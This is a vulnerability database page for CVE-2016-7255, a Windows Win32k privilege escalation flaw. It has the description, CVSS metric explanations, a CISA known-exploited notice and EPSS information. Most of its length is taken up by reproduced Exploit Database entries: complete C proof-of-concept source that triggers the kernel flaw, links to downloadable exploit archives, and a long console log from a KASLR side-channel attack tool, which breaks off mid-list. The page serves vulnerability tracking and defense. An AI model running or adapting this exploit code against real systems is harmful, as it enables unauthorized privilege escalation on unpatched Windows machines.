CVE-2016-7255 Detail

CVE-2016-7255

Score / Severity

7.8

High

EPSS

4.43%V3

Vector

Local

Published

2016-11-10
06h16 +00:00

Modified

2025-02-10
16h41 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE Other	No informations.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V3.1	7.8	HIGH	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Local The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. Required Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator. Base: Scope Metrics The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. Unchanged An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact Metrics The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. High There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. High There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental Metrics These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.	[email protected]
V2	7.2		AV:L/AC:L/Au:N/C:C/I:C/A:C	[email protected]

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Microsoft Win32k Privilege Escalation Vulnerability

Required action : Apply updates per vendor instructions.

Known To Be Used in Ransomware Campaigns : Unknown

Added : 2021-11-02 23h00 +00:00

Action is due : 2022-05-02 22h00 +00:00

Important information

This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 40745

Publication date : 2016-11-08 23h00 +00:00
Author : TinySec
EDB Verified : No

/* Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255 Full Proof of Concept: https://github.com/tinysec/public/tree/master/CVE-2016-7255 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40745.zip ******************************************************************** Created: 2016-11-09 14:23:09 Filename: main.c Author: root[at]TinySec.net Version 0.0.0.1 Purpose: poc of cve-2016-0075 ********************************************************************* */ #include <windows.h> #include <wchar.h> #include <stdlib.h> #include <stdio.h> ////////////////////////////////////////////////////////////////////////// #pragma comment(lib,"ntdll.lib") #pragma comment(lib,"user32.lib") #undef DbgPrint ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); ULONG __cdecl DbgPrint(__in char* Format, ...) { CHAR* pszDbgBuff = NULL; va_list VaList=NULL; ULONG ulRet = 0; do { pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); if (NULL == pszDbgBuff) { break; } RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); va_start(VaList,Format); _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); DbgPrintEx(77 , 0 , pszDbgBuff ); OutputDebugStringA(pszDbgBuff); va_end(VaList); } while (FALSE); if (NULL != pszDbgBuff) { HeapFree( GetProcessHeap(), 0 , pszDbgBuff ); pszDbgBuff = NULL; } return ulRet; } int _sim_key_down(WORD wKey) { INPUT stInput = {0}; do { stInput.type = INPUT_KEYBOARD; stInput.ki.wVk = wKey; stInput.ki.dwFlags = 0; SendInput(1 , &stInput , sizeof(stInput) ); } while (FALSE); return 0; } int _sim_key_up(WORD wKey) { INPUT stInput = {0}; do { stInput.type = INPUT_KEYBOARD; stInput.ki.wVk = wKey; stInput.ki.dwFlags = KEYEVENTF_KEYUP; SendInput(1 , &stInput , sizeof(stInput) ); } while (FALSE); return 0; } int _sim_alt_shift_esc() { int i = 0; do { _sim_key_down( VK_MENU ); _sim_key_down( VK_SHIFT ); _sim_key_down( VK_ESCAPE); _sim_key_up( VK_ESCAPE); _sim_key_down( VK_ESCAPE); _sim_key_up( VK_ESCAPE); _sim_key_up( VK_MENU ); _sim_key_up( VK_SHIFT ); } while (FALSE); return 0; } int _sim_alt_shift_tab(int nCount) { int i = 0; HWND hWnd = NULL; int nFinalRet = -1; do { _sim_key_down( VK_MENU ); _sim_key_down( VK_SHIFT ); for ( i = 0; i < nCount ; i++) { _sim_key_down( VK_TAB); _sim_key_up( VK_TAB); Sleep(1000); } _sim_key_up( VK_MENU ); _sim_key_up( VK_SHIFT ); } while (FALSE); return nFinalRet; } int or_address_value_4(__in void* pAddress) { WNDCLASSEXW stWC = {0}; HWND hWndParent = NULL; HWND hWndChild = NULL; WCHAR* pszClassName = L"cve-2016-7255"; WCHAR* pszTitleName = L"cve-2016-7255"; void* pId = NULL; MSG stMsg = {0}; do { stWC.cbSize = sizeof(stWC); stWC.lpfnWndProc = DefWindowProcW; stWC.lpszClassName = pszClassName; if ( 0 == RegisterClassExW(&stWC) ) { break; } hWndParent = CreateWindowExW( 0, pszClassName, NULL, WS_OVERLAPPEDWINDOW|WS_VISIBLE, 0, 0, 360, 360, NULL, NULL, GetModuleHandleW(NULL), NULL ); if (NULL == hWndParent) { break; } hWndChild = CreateWindowExW( 0, pszClassName, pszTitleName, WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, 0, 0, 160, 160, hWndParent, NULL, GetModuleHandleW(NULL), NULL ); if (NULL == hWndChild) { break; } #ifdef _WIN64 pId = ( (UCHAR*)pAddress - 0x28 ); #else pId = ( (UCHAR*)pAddress - 0x14); #endif // #ifdef _WIN64 SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); DbgPrint("hWndChild = 0x%p\n" , hWndChild); DebugBreak(); ShowWindow(hWndParent , SW_SHOWNORMAL); SetParent(hWndChild , GetDesktopWindow() ); SetForegroundWindow(hWndChild); _sim_alt_shift_tab(4); SwitchToThisWindow(hWndChild , TRUE); _sim_alt_shift_esc(); while( GetMessage(&stMsg , NULL , 0 , 0) ) { TranslateMessage(&stMsg); DispatchMessage(&stMsg); } } while (FALSE); if ( NULL != hWndParent ) { DestroyWindow(hWndParent); hWndParent = NULL; } if ( NULL != hWndChild ) { DestroyWindow(hWndChild); hWndChild = NULL; } UnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); return 0; } int __cdecl wmain(int nArgc, WCHAR** Argv) { do { or_address_value_4( (void*)0xFFFFFFFF ); } while (FALSE); return 0; }

Exploit Database EDB-ID : 40823

Publication date : 2016-11-23 23h00 +00:00
Author : IOactive
EDB Verified : No

Complete Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip Presentation: https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016 Requirements Intel Processor (Haswell or newer) Windows 10 x64 Usage Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry: C:\Users\qa\Desktop>ASLRSideChannelAttack.exe +] Setting thread affinity to CPU 0 +] Getting all the potential PML4 SelfRef +] Mapping a page oracle +] Allocating probing target pages... Allocation 0: 0000020E339D0000 Allocation 1: 0000020E339E0000 Allocation 2: 0000020E339F0000 Allocation 3: 0000020E33A00000 Allocation 4: 0000020E33A10000 -------------------------- +] Check that Unammped and Mapped values are consistent across several executions! -------------------------- Unmapped Initial: 256.683746 Mapped Initial: 203.692978 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 247.440018 Mapped: 202.827560 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213 +] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563 +] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382 +] PTE FFFF81010719D000 looks mapped! - Time: 197.297256 +] PTE FFFF81010719D080 looks mapped! - Time: 194.501175 +] PTE FFFF810804020100 looks mapped! - Time: 204.740097 +] Removing 102 from initial array and pushing it into final array Potential SelfRef: FFFF81C0E0703818 +] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616 +] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774 +] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921 +] PTE FFFF81810719D000 looks mapped! - Time: 202.525726 +] PTE FFFF81810719D080 looks mapped! - Time: 208.673874 Time difference exceed for ffff818804020100, retrying... +] PTE FFFF818804020100 looks mapped! - Time: 209.071213 +] Removing 103 from initial array and pushing it into final array Time difference exceed for ffff824120904820, retrying... Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642 Time difference exceed for ffff82010719cf00, retrying... +] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593 +] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344 +] PTE FFFF82010719D000 looks mapped! - Time: 207.820862 +] PTE FFFF82010719D080 looks mapped! - Time: 197.229263 +] PTE FFFF820804020100 looks mapped! - Time: 204.585739 +] Removing 104 from initial array and pushing it into final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003 Time difference exceed for ffff8341a0d06830, retrying... Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657 +] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697 +] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016 +] PTE FFFF83010719D000 looks mapped! - Time: 214.013504 +] PTE FFFF83010719D080 looks mapped! - Time: 191.688126 +] PTE FFFF830804020100 looks mapped! - Time: 193.314758 +] Removing 106 from initial array and pushing it into final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973 +] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693 +] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097 +] PTE FFFF83810719D000 looks mapped! - Time: 216.298660 +] PTE FFFF83810719D080 looks mapped! - Time: 203.848816 +] PTE FFFF838804020100 looks mapped! - Time: 204.008743 +] Removing 107 from initial array and pushing it into final array Time difference exceed for ffff89c4e2713898, retrying... Time difference exceed for ffff8bc5e2f178b8, retrying... Time difference exceed for ffff8c46231188c0, retrying... Unmapped Initial: 248.508636 Mapped Initial: 207.139847 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 236.360733 Mapped: 195.650040 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363 Potential SelfRef: FFFF81C0E0703818 Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... +] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393 Time difference exceed for ffff81810719cf00, retrying... +] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645 +] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724 +] PTE FFFF81810719D000 looks mapped! - Time: 197.655167 +] PTE FFFF81810719D080 looks mapped! - Time: 201.667160 +] PTE FFFF818804020100 looks mapped! - Time: 195.728439 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF81C0E0703818 - Index: 103 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff818000000000 -] Erasing 103 from final array Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759 +] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019 +] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364 +] PTE FFFF82010719D000 looks mapped! - Time: 203.052826 +] PTE FFFF82010719D080 looks mapped! - Time: 194.115143 +] PTE FFFF820804020100 looks mapped! - Time: 198.158585 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff820000000000 -] Erasing 104 from final array Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823 +] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525 +] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040 +] PTE FFFF83010719D000 looks mapped! - Time: 196.066254 +] PTE FFFF83010719D080 looks mapped! - Time: 189.007034 +] PTE FFFF830804020100 looks mapped! - Time: 197.613953 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff830000000000 -] Erasing 106 from final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380 Time difference exceed for ffff83810719cf00, retrying... Time difference exceed for ffff83810719cf00, retrying... Unmapped Initial: 232.123840 Mapped Initial: 196.420654 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 234.845581 Mapped: 187.862518 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938 +] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766 Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... +] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784 +] PTE FFFF81010719D000 looks mapped! - Time: 194.332733 +] PTE FFFF81010719D080 looks mapped! - Time: 200.211182 +] PTE FFFF810804020100 looks mapped! - Time: 199.812225 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff810000000000 Time difference exceed for ffff810000000000, retrying... -] Erasing 102 from final array Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 230.247162 Mapped Initial: 198.023987 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 235.923035 Mapped: 191.605301 -------------------------- Time difference exceed for ffff83c1e0f07838, retrying... Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 258.041046 Mapped Initial: 210.309753 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 238.757538 Mapped: 203.896240 -------------------------- Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102 +] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836 +] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333 +] PTE FFFF83810719D000 looks mapped! - Time: 197.218445 +] PTE FFFF83810719D080 looks mapped! - Time: 203.334763 +] PTE FFFF838804020100 looks mapped! - Time: 203.243607 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff838000000000 -] Erasing 107 from final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221 +] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138 +] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006 +] PTE FFFF82810719D000 looks mapped! - Time: 209.909943 +] PTE FFFF82810719D080 looks mapped! - Time: 202.795639 +] PTE FFFF828804020100 looks mapped! - Time: 196.754044 +] Removing 105 from initial array and pushing it into final array Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff90c864321908, retrying... Unmapped Initial: 257.754272 Mapped Initial: 207.903702 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 247.145935 Mapped: 207.792923 -------------------------- Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092 +] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715 +] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614 +] PTE FFFF82810719D000 looks mapped! - Time: 213.698837 +] PTE FFFF82810719D080 looks mapped! - Time: 210.162796 +] PTE FFFF828804020100 looks mapped! - Time: 208.765045 PML4e: FFFF82C160B05828 - Index: 105 KNOWN_UNMAPPED PTE: ffff828000000000 -] Erasing 105 from final array -] Removing 100 as it seems to be unmapped -] Removing 101 as it seems to be unmapped -] Removing 108 as it seems to be unmapped -] Removing 109 as it seems to be unmapped -] Removing 10a as it seems to be unmapped -] Removing 10b as it seems to be unmapped -] Removing 10c as it seems to be unmapped -] Removing 10d as it seems to be unmapped Time difference exceed for ffff8743a1d0e870, retrying... -] Removing 10e as it seems to be unmapped -] Removing 10f as it seems to be unmapped -] Removing 110 as it seems to be unmapped Time difference exceed for ffff88c462311888, retrying... -] Removing 111 as it seems to be unmapped -] Removing 112 as it seems to be unmapped -] Removing 113 as it seems to be unmapped Time difference exceed for ffff8a45229148a0, retrying... -] Removing 114 as it seems to be unmapped -] Removing 115 as it seems to be unmapped -] Removing 116 as it seems to be unmapped -] Removing 117 as it seems to be unmapped Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffe8f47a3d1e88, retrying... Potential SelfRef: FFFFF67B3D9ECF60 +] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379 +] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694 +] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502 +] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920 +] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059 +] PTE FFFFF60804020100 looks mapped! - Time: 211.636246 +] Removing 1ec from initial array and pushing it into final array Unmapped Initial: 233.678802 Mapped Initial: 214.496124 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 250.585373 Mapped: 213.339661 -------------------------- Potential SelfRef: FFFFF67B3D9ECF60 +] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174 +] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457 +] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861 +] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334 +] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160 +] PTE FFFFF60804020100 looks mapped! - Time: 204.036926 PML4e: FFFFF67B3D9ECF60 - Index: 1ec KNOWN_UNMAPPED PTE: fffff60000000000 Real PML4 SelfRef Found: fffff67b3d9ecf60 Left in Potential Array: ffff8c46231188c0 Left in Potential Array: ffff8cc6633198c8 Left in Potential Array: ffff8d46a351a8d0 Left in Potential Array: ffff8dc6e371b8d8 Left in Potential Array: ffff8e472391c8e0 Left in Potential Array: ffff8ec763b1d8e8 Left in Potential Array: ffff8f47a3d1e8f0 Left in Potential Array: ffff8fc7e3f1f8f8 Left in Potential Array: ffff904824120900 Left in Potential Array: ffff90c864321908 Left in Potential Array: ffff9148a4522910 Left in Potential Array: ffff91c8e4723918 Left in Potential Array: ffff924924924920 Left in Potential Array: ffff92c964b25928 Left in Potential Array: ffff9349a4d26930 Left in Potential Array: ffff93c9e4f27938 Left in Potential Array: ffff944a25128940 Left in Potential Array: ffff94ca65329948 Left in Potential Array: ffff954aa552a950 Left in Potential Array: ffff95cae572b958 Left in Potential Array: ffff964b2592c960 Left in Potential Array: ffff96cb65b2d968 Left in Potential Array: ffff974ba5d2e970 Left in Potential Array: ffff97cbe5f2f978 Left in Potential Array: ffff984c26130980 Left in Potential Array: ffff98cc66331988 Left in Potential Array: ffff994ca6532990 Left in Potential Array: ffff99cce6733998 Left in Potential Array: ffff9a4d269349a0 Left in Potential Array: ffff9acd66b359a8 Left in Potential Array: ffff9b4da6d369b0 Left in Potential Array: ffff9bcde6f379b8 Left in Potential Array: ffff9c4e271389c0 Left in Potential Array: ffff9cce673399c8 Left in Potential Array: ffff9d4ea753a9d0 Left in Potential Array: ffff9dcee773b9d8 Left in Potential Array: ffff9e4f2793c9e0 Left in Potential Array: ffff9ecf67b3d9e8 Left in Potential Array: ffff9f4fa7d3e9f0 Left in Potential Array: ffff9fcfe7f3f9f8 Left in Potential Array: ffffa05028140a00 Left in Potential Array: ffffa0d068341a08 Left in Potential Array: ffffa150a8542a10 Left in Potential Array: ffffa1d0e8743a18 Left in Potential Array: ffffa25128944a20 Left in Potential Array: ffffa2d168b45a28 Left in Potential Array: ffffa351a8d46a30 Left in Potential Array: ffffa3d1e8f47a38 Left in Potential Array: ffffa45229148a40 Left in Potential Array: ffffa4d269349a48 Left in Potential Array: ffffa552a954aa50 Left in Potential Array: ffffa5d2e974ba58 Left in Potential Array: ffffa6532994ca60 Left in Potential Array: ffffa6d369b4da68 Left in Potential Array: ffffa753a9d4ea70 Left in Potential Array: ffffa7d3e9f4fa78 Left in Potential Array: ffffa8542a150a80 Left in Potential Array: ffffa8d46a351a88 Left in Potential Array: ffffa954aa552a90 Left in Potential Array: ffffa9d4ea753a98 Left in Potential Array: ffffaa552a954aa0 Left in Potential Array: ffffaad56ab55aa8 Left in Potential Array: ffffab55aad56ab0 Left in Potential Array: ffffabd5eaf57ab8 Left in Potential Array: ffffac562b158ac0 Left in Potential Array: ffffacd66b359ac8 Left in Potential Array: ffffad56ab55aad0 Left in Potential Array: ffffadd6eb75bad8 Left in Potential Array: ffffae572b95cae0 Left in Potential Array: ffffaed76bb5dae8 Left in Potential Array: ffffaf57abd5eaf0 Left in Potential Array: ffffafd7ebf5faf8 Left in Potential Array: ffffb0582c160b00 Left in Potential Array: ffffb0d86c361b08 Left in Potential Array: ffffb158ac562b10 Left in Potential Array: ffffb1d8ec763b18 Left in Potential Array: ffffb2592c964b20 Left in Potential Array: ffffb2d96cb65b28 Left in Potential Array: ffffb359acd66b30 Left in Potential Array: ffffb3d9ecf67b38 Left in Potential Array: ffffb45a2d168b40 Left in Potential Array: ffffb4da6d369b48 Left in Potential Array: ffffb55aad56ab50 Left in Potential Array: ffffb5daed76bb58 Left in Potential Array: ffffb65b2d96cb60 Left in Potential Array: ffffb6db6db6db68 Left in Potential Array: ffffb75badd6eb70 Left in Potential Array: ffffb7dbedf6fb78 Left in Potential Array: ffffb85c2e170b80 Left in Potential Array: ffffb8dc6e371b88 Left in Potential Array: ffffb95cae572b90 Left in Potential Array: ffffb9dcee773b98 Left in Potential Array: ffffba5d2e974ba0 Left in Potential Array: ffffbadd6eb75ba8 Left in Potential Array: ffffbb5daed76bb0 Left in Potential Array: ffffbbddeef77bb8 Left in Potential Array: ffffbc5e2f178bc0 Left in Potential Array: ffffbcde6f379bc8 Left in Potential Array: ffffbd5eaf57abd0 Left in Potential Array: ffffbddeef77bbd8 Left in Potential Array: ffffbe5f2f97cbe0 Left in Potential Array: ffffbedf6fb7dbe8 Left in Potential Array: ffffbf5fafd7ebf0 Left in Potential Array: ffffbfdfeff7fbf8 Left in Potential Array: ffffc06030180c00 Left in Potential Array: ffffc0e070381c08 Left in Potential Array: ffffc160b0582c10 Left in Potential Array: ffffc1e0f0783c18 Left in Potential Array: ffffc26130984c20 Left in Potential Array: ffffc2e170b85c28 Left in Potential Array: ffffc361b0d86c30 Left in Potential Array: ffffc3e1f0f87c38 Left in Potential Array: ffffc46231188c40 Left in Potential Array: ffffc4e271389c48 Left in Potential Array: ffffc562b158ac50 Left in Potential Array: ffffc5e2f178bc58 Left in Potential Array: ffffc6633198cc60 Left in Potential Array: ffffc6e371b8dc68 Left in Potential Array: ffffc763b1d8ec70 Left in Potential Array: ffffc7e3f1f8fc78 Left in Potential Array: ffffc86432190c80 Left in Potential Array: ffffc8e472391c88 Left in Potential Array: ffffc964b2592c90 Left in Potential Array: ffffc9e4f2793c98 Left in Potential Array: ffffca6532994ca0 Left in Potential Array: ffffcae572b95ca8 Left in Potential Array: ffffcb65b2d96cb0 Left in Potential Array: ffffcbe5f2f97cb8 Left in Potential Array: ffffcc6633198cc0 Left in Potential Array: ffffcce673399cc8 Left in Potential Array: ffffcd66b359acd0 Left in Potential Array: ffffcde6f379bcd8 Left in Potential Array: ffffce673399cce0 Left in Potential Array: ffffcee773b9dce8 Left in Potential Array: ffffcf67b3d9ecf0 Left in Potential Array: ffffcfe7f3f9fcf8 Left in Potential Array: ffffd068341a0d00 Left in Potential Array: ffffd0e8743a1d08 Left in Potential Array: ffffd168b45a2d10 Left in Potential Array: ffffd1e8f47a3d18 Left in Potential Array: ffffd269349a4d20 Left in Potential Array: ffffd2e974ba5d28 Left in Potential Array: ffffd369b4da6d30 Left in Potential Array: ffffd3e9f4fa7d38 Left in Potential Array: ffffd46a351a8d40 Left in Potential Array: ffffd4ea753a9d48 Left in Potential Array: ffffd56ab55aad50 Left in Potential Array: ffffd5eaf57abd58 Left in Potential Array: ffffd66b359acd60 Left in Potential Array: ffffd6eb75badd68 Left in Potential Array: ffffd76bb5daed70 